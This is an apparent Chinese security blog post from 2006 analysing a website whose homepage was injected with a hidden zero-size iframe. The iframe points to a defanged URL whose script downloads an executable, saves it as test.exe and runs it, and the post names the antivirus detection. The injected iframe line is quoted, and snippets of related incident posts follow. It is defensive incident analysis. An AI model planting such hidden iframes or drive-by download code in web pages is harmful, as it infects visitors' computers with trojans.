endurer 原创
2006-08-22 第1版
首页有3处地方被加入:
/————
<iframe height=0 width=0 src=”hxxp://***object.cnic**b.com/15”></iframe>
-———-/
hxxp://***object.cnic**b.com/15 的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
du.exe 采用 nSPack 1.3 加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul。
*endurer** 原创 2006-09-21 第**1**版 该网站首页被加入代码: /-------- <script language="JavaS...
*endurer** 原创 2006-09-06 第**2**版 2006-09-02 第**1**版 网站 hxxp://www.94l\*\*\*m.com...
*endurer** 原创 2006-08-22 第**1**版 首页有3处地方被加入: /-------- <iframe height=0 width=0...
*endurer** 原创 2006-08-22 第**1**版 今天又看了看[![authorship.gif][] 两个会自动下载恶意程序文件的政府网站][aut...
endurer 原创 2006-09-30 第 3版 补充瑞星的反应。 2006-09-29 22:34:00 第 2版 补充Kaspersky的回复。 2006
endurer 原创 2007-06-07 第1版 有网友说他的电脑打开某个网站后不久,杀毒软件的实时监控被关闭,系统时间被修改,接着安装各种网络游戏和聊天账号的盗号木马
endurer 原创 2007-01-23 第1版 网站首页包含代码: /------- <iframe height="0" width="0" src="hxx
endurer 原创 2006-12-01 第1版 网页首部被加入两段代码: 代码段1: /--------- <iframe height=0 width=
endurer 原创 2006-10-25 第1版 网页首部被两次加入代码: /--------- <iframe height=0 width=0 src="hx
有时候我们需要分析一个网站,或者基于一个网站进行魔改,这个就需要一些特殊的手段将网站源码下载到本地了,其实目前大部分网站都是有代码压缩的,很难去有修改。 这里我就教大家如何
布满荆棘的人生
小灰灰
我就是我
还没有评论,来说两句吧...